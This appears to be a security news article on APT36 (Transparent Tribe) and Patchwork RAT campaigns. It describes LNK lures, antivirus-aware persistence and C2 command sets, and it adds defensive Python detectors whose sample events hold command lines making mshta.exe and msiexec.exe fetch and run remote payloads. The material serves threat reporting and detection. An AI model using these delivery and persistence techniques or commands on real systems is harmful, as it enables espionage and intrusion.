Fyself News
Transparent Tribe launches new RAT attack against Indian government and academia

January 2, 2026

The threat actor known as Transparent Tribe is believed to have launched new attacks targeting government, academic, and strategic organizations in India, using remote access Trojans (RATs) that give it persistent control over compromised hosts.

“The campaign uses deceptive delivery techniques, including weaponized Windows shortcut (LNK) files that are disguised as legitimate PDF documents and embed full PDF content to avoid user suspicion,” CYFIRMA said in a technical report.

Transparent Tribe, also known as APT36, is a hacking group known for cyber espionage operations against organizations in India. The state-sponsored adversary, believed to be of Pakistani origin, has been active since at least 2013.

This threat actor boasts an ever-evolving arsenal of RATs to achieve its objectives. Trojans used by Transparent Tribe in recent years include CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.

The latest round of attacks begins with spear-phishing emails carrying ZIP archives that contain LNK files disguised as PDFs. Opening the shortcut runs a remote HTML Application (HTA) script via ‘mshta.exe’, which decrypts the final RAT payload and loads it directly into memory. In parallel, the HTA downloads and opens a decoy PDF document to avoid arousing the user’s suspicion.

“Once the decoding logic is established, the HTA leverages ActiveX objects, specifically WScript.Shell, to interact with the Windows environment,” CYFIRMA said. “This behavior is indicative of environmental profiling and runtime manipulation, techniques to ensure compatibility with the target system and increase reliability of execution commonly observed in malware that exploits ‘mshta.exe’.”


What is notable about this malware is its ability to adapt its persistence method based on the antivirus solution installed on the infected machine.

If Kaspersky is detected, it creates a working directory under ‘C:\Users\Public\core\’, writes an obfuscated HTA payload to disk, establishes persistence by dropping an LNK file into the Windows Startup folder, and then launches the HTA script using ‘mshta.exe’. If Quick Heal is detected, it creates a batch file and a malicious LNK file in the Startup folder and writes the HTA payload to disk to establish persistence. If Avast, AVG, or Avira is detected, it copies the payload directly into the Startup folder and runs it. If no recognized antivirus product is detected, it falls back to a combination of batch file execution, registry-based persistence, and payload deployment before invoking the batch script.

The second HTA file embeds a DLL named “iinneldc.dll” that acts as a full-featured RAT, supporting remote system control, file management, data extraction, screenshot capture, clipboard manipulation, and process control.

“APT36 (Transparent Tribe) remains a highly persistent and strategically driven cyber espionage threat, with a continued focus on intelligence gathering targeting Indian government agencies, educational institutions, and other strategically relevant sectors,” the cybersecurity firm said.

In recent weeks, APT36 has also been linked to another campaign that leverages a malicious shortcut file disguised as a government advisory PDF (‘NCERT-Whatsapp-Advisory.pdf.lnk’) to deliver a .NET-based loader. The attack drops additional executables and malicious DLLs to perform remote command execution and system reconnaissance and to establish long-term access.

The shortcut uses cmd.exe to run an obfuscated command that retrieves an MSI installer (‘nikmights.msi’) from a remote server (‘aeroclubofindia.co[.]in’). The installer is responsible for starting the following sequence of actions:

  • Extract the decoy PDF document and display it to the victim
  • Decode the DLL files and write them to “C:\ProgramData\PcDirvs\pdf.dll” and “C:\ProgramData\PcDirvs\wininet.dll”
  • Drop “PcDirvs.exe” in the same location and run it after a 10-second delay
  • Create “PcDirvs.hta”, containing a Visual Basic script that establishes registry-based persistence so that “PcDirvs.exe” is launched every time the system starts up
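The two delivery chains above share a small set of host-observable behaviours: a shortcut that makes explorer.exe spawn mshta.exe (or cmd.exe spawn msiexec.exe) with a remote URL, a script or shortcut dropped into a Startup folder, and a Run key pointing at a user-writable location. The following detection logic is an added example written for this page, not CYFIRMA's tooling and not code from either campaign. It runs over constructed events shaped like Sysmon Event ID 1 (process creation), 11 (file creation) and 13 (registry value set) records rendered as dicts; the field names follow Sysmon, but every path, SID, hostname and command line is invented for the example.

```python
"""Detect the LNK -> mshta.exe / cmd.exe -> msiexec.exe delivery and the
Startup-folder and Run-key persistence described on this page.
Added example; the events below are constructed, not real telemetry."""
import re

URL_RE = re.compile(r"https?://", re.I)
# .lnk/.hta/.bat/.vbs/.js written into a per-user or all-users Startup folder
STARTUP_DROP_RE = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:lnk|hta|bat|vbs|js)$", re.I)
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
# locations an unprivileged user can write to
USER_WRITABLE_RE = re.compile(r"\\(?:ProgramData|Users\\Public|AppData)\\", re.I)
SCRIPT_HOST_RE = re.compile(r"\b(?:mshta|wscript|cscript)\.exe\b", re.I)

# Constructed sample telemetry (hypothetical hosts, users and paths).
SAMPLE_EVENTS = [
    # benign: a local HTA launched by an installed application
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\app.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\ui.hta"'},
    # LNK lure: explorer.exe runs mshta.exe against a remote HTA
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://lure.invalid/advisory.hta"},
    # the HTA stage drops a shortcut into the user's Startup folder
    {"EventID": 11, "Image": r"C:\Windows\System32\mshta.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    # benign file write
    {"EventID": 11, "Image": r"C:\Program Files\Vendor\app.exe",
     "TargetFilename": r"C:\Users\victim\Documents\notes.txt"},
    # second chain: cmd.exe pulls an MSI package from a remote host
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msiexec.exe /i https://lure.invalid/pkg.msi /qn"},
    # Run value pointing at an executable under ProgramData
    {"EventID": 13, "Image": r"C:\Windows\System32\mshta.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\PcDirvs",
     "Details": r"C:\ProgramData\PcDirvs\PcDirvs.exe"},
    # benign Run value
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Tray",
     "Details": r"C:\Program Files\Vendor\tray.exe"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, detail) for every event that matches a rule."""
    hits = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:
            image = _basename(ev.get("Image", ""))
            cmd = ev.get("CommandLine", "")
            if image == "mshta.exe" and URL_RE.search(cmd):
                hits.append(("mshta_remote_hta", cmd))
            elif image == "msiexec.exe" and URL_RE.search(cmd):
                hits.append(("msiexec_remote_package", cmd))
        elif eid == 11:
            target = ev.get("TargetFilename", "")
            if STARTUP_DROP_RE.search(target):
                hits.append(("startup_folder_drop", target))
        elif eid == 13:
            key = ev.get("TargetObject", "")
            data = ev.get("Details", "")
            if RUN_KEY_RE.search(key) and (
                    USER_WRITABLE_RE.search(data) or SCRIPT_HOST_RE.search(data)):
                hits.append(("run_key_persistence", key + " -> " + data))
    return hits


def triggered_rules(events):
    """Just the rule names, in event order; handy for assertions."""
    return [rule for rule, _ in detect(events)]


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The mshta.exe rule keys on a URL rather than on the process itself, since HTA files shipped by legitimate software are run from local paths; pair it with the parent process (explorer.exe for a double-clicked shortcut) if the URL check alone is too noisy in your environment.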

It is worth pointing out that the lure PDF is a legitimate advisory issued by the Pakistan National Cyber Emergency Response Team (PKCERT) in 2024 about a fraudulent WhatsApp message campaign that targeted government agencies in Pakistan with malicious WinRAR files to infect their systems with malware.

The DLL “wininet.dll” connects to hard-coded command-and-control (C2) infrastructure hosted at dns.wmiprovider[.]com, a domain registered in mid-April 2025. The C2 associated with this activity is currently inactive, but because of the Windows registry-based persistence, the threat may return at any time.

“The DLL implements multiple HTTP GET-based endpoints to establish communication with the C2 server, perform updates, and retrieve commands issued by the attacker,” CYFIRMA said. “Endpoint characters are intentionally stored in reverse order to avoid static string detection.”

Here is the list of endpoints:

  • /retsiger (register), registers the infected system with the C2 server
  • /taebtraeh (heartbeat), beacons its presence to the C2 server
  • /dnammoc_teg (get_command), executes arbitrary commands via “cmd.exe”
  • /dnammocmvitna (antivmcommand), queries or sets the anti-VM status and adjusts behavior accordingly
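Storing “/retsiger” instead of “/register” defeats a rule that greps the binary for the readable endpoint, but it is trivial to undo once you know the trick: reverse every extracted string before matching. The scanner below is an added example written for this page, not CYFIRMA's tooling and not the malware's code, and it goes slightly beyond the listing above by also handling a path stored with its slash reversed (“retsiger/”). SAMPLE_BLOB is a constructed byte string standing in for a DLL's string table; it is not the real wininet.dll, and the host name in it is invented.

```python
"""Recover reversed C2 endpoint strings from a binary blob.
Added example; SAMPLE_BLOB is constructed, not an extract of the real DLL."""
import re

# Readable form of the endpoints listed on the page.
KNOWN_ENDPOINTS = {"/register", "/heartbeat", "/get_command", "/antivmcommand"}

# printable ASCII runs of four or more bytes, the way `strings` sees them
PRINTABLE_RUN_RE = re.compile(rb"[\x20-\x7e]{4,}")

SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00"     # a few header-like bytes
    + b"/retsiger\x00"                # slash kept, name reversed
    + b"\x00\x00taebtraeh/\x00"       # whole path reversed
    + b"/dnammoc_teg\x00"
    + b"/dnammocmvitna\x00"
    + b"User-Agent: Mozilla/5.0\x00"  # forward string, must not match
    + b"dns.c2.invalid\x00"           # invented host name
)


def extract_strings(blob):
    """Printable ASCII runs, decoded to str."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN_RE.finditer(blob)]


def naive_match(blob):
    """What a forward-only string rule sees in this blob: nothing."""
    return [s for s in extract_strings(blob) if s in KNOWN_ENDPOINTS]


def decode_reversed_path(s):
    """Normalise "/retsiger", "retsiger/" or "retsiger" to "/register"."""
    return "/" + s.strip("/")[::-1]


def find_reversed_endpoints(blob):
    """Map each on-disk reversed string to the endpoint it hides."""
    found = {}
    for s in extract_strings(blob):
        decoded = decode_reversed_path(s)
        if decoded in KNOWN_ENDPOINTS:
            found[s] = decoded
    return found


if __name__ == "__main__":
    print("forward match:", naive_match(SAMPLE_BLOB))
    for raw, endpoint in find_reversed_endpoints(SAMPLE_BLOB).items():
        print(f"{raw!r:>18} -> {endpoint}")
```

The same idea ports directly to a YARA rule: declare the reversed literals (`"/retsiger"`, `"/taebtraeh"`, ...) as the strings to look for, since the on-disk form is what the scanner will actually see.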

The DLL also enumerates the antivirus products installed on the victim’s system, making it a capable tool for reconnaissance and for collecting sensitive information.

Patchwork linked to new StreamSpy Trojan

The disclosure comes weeks after a hacking group believed to be of Indian origin called Patchwork (also known as Dropping Elephant or Maha Grass) was linked to attacks targeting Pakistan’s defense sector using a Python-based backdoor distributed via phishing emails carrying ZIP files, security researcher Idan Talab said.

Inside the archive is an MSBuild project file that, when run via “msbuild.exe”, eventually unpacks a dropper that installs and launches the Python RAT. The malware can connect to a C2 server, run remote Python modules, execute commands, and upload and download files.

“This campaign represents a modernized and highly obfuscated Patchwork APT toolkit that blends the MSBuild LOLBin loader, a PyInstaller-modified Python runtime, marshaled bytecode implants, geofencing, and randomized PHP C2 endpoints [and] a viable persistence mechanism,” Talab said.

As of December 2025, Patchwork has also been associated with a previously undocumented Trojan named StreamSpy that uses the WebSocket and HTTP protocols for C2 communication: the WebSocket channel is used to receive instructions and return execution results, while HTTP is used for file transfers.

According to QiAnXin, the link between StreamSpy and Patchwork stems from its similarities to Spyder, a variant of another backdoor named WarHawk that has been attributed to SideWinder. Patchwork’s use of Spyder dates back to 2023.


Distributed via a ZIP archive (‘OPS-VII-SIR.zip’) hosted at ‘firebasescloudemail[.]com’, the malware (‘Annexure.exe’) collects system information, establishes persistence via the Windows registry, scheduled tasks, or LNK files in the Startup folder, and communicates with the C2 server over HTTP and WebSockets. The supported commands are listed below.

  • F1A5C3, download a file and open it using ShellExecuteExW
  • B8C1D2, set the command execution shell to cmd
  • E4F5A6, set the command execution shell to PowerShell
  • FL_SH1, close all shells
  • C9E3D4, E7F8A9, H1K4R8, C0V3RT, download an encrypted ZIP file from the C2 server, unzip it, and open it using ShellExecuteExW
  • F2B3C4, gather information about the file system and all disks attached to the device
  • D5E6F7, perform file uploads and downloads
  • A8B9C0, perform file uploads
  • D1E2F3, delete files
  • A4B5C6, rename files
  • D7E8F9, enumerate specific folders

According to QiAnXin, the StreamSpy download site also hosts a Spyder variant with extensive data collection capabilities, and the malware’s digital signature shows a correlation to another Windows RAT called ShadowAgent, attributed to DoNot Team (also known as Brainworm). Interestingly, the 360 Threat Intelligence Center flagged the same “Annexure.exe” executable as ShadowAgent in November 2025.

“The emergence of the StreamSpy Trojan and Spyder variants from the Maha Grass group indicates that the group is continually iterating its attack tools,” the Chinese security vendor said.

“With the StreamSpy Trojan, the attacker attempts to use a WebSocket channel for issuing commands and feedback of results in order to evade detection and censorship of HTTP traffic. Additionally, correlation samples further confirm that the Maha Grass and DoNot attack groups have some connection in terms of resource sharing.”
